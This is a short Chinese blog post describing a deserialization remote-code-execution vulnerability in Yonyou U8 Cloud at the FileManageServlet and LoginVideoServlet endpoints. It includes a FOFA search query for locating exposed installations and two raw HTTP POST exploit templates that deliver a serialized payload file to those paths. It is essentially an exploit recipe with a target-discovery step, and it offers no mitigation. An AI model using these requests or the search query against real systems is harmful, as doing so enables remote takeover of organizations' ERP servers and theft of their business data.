Babing
Published on 2024-08-30 / 0 Visits
0
0

Y3-34用友-U8-Cloud-反序列化RCE

Y3-34用友-U8-Cloud-反序列化RCE

漏洞描述:

用友U8 Cloud存在多处(FileManageServlet和LoginVideoServlet)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。

影响版本:

用友U8 Cloud 所有版本

网站图片:

image-20240623104421449

网络测绘:

fofa语法:

FOFA:app=“用友-U8-Cloud”

漏洞复现:

两处接口的反序列化漏洞路径:

/servlet/~uap/nc.impl.pub.filesystem.FileManageServlet
/servlet/~uap/nc.bs.sm.login2.LoginVideoServlet

payload:

POST /servlet/~uap/nc.impl.pub.filesystem.FileManageServlet HTTP/1.1
Host: your-ip
Content-Type: *

{{file(C:\Users\m1813\Desktop\4.ser)}}

POST /servlet/~uap/nc.bs.sm.login2.LoginVideoServlet HTTP/1.1
Host: your-ip
Content-Type: *

{{file(C:\Users\m1813\Desktop\4.ser)}}

PS:里面生成序列化数据文件的路径自行修改

效果图:


Comment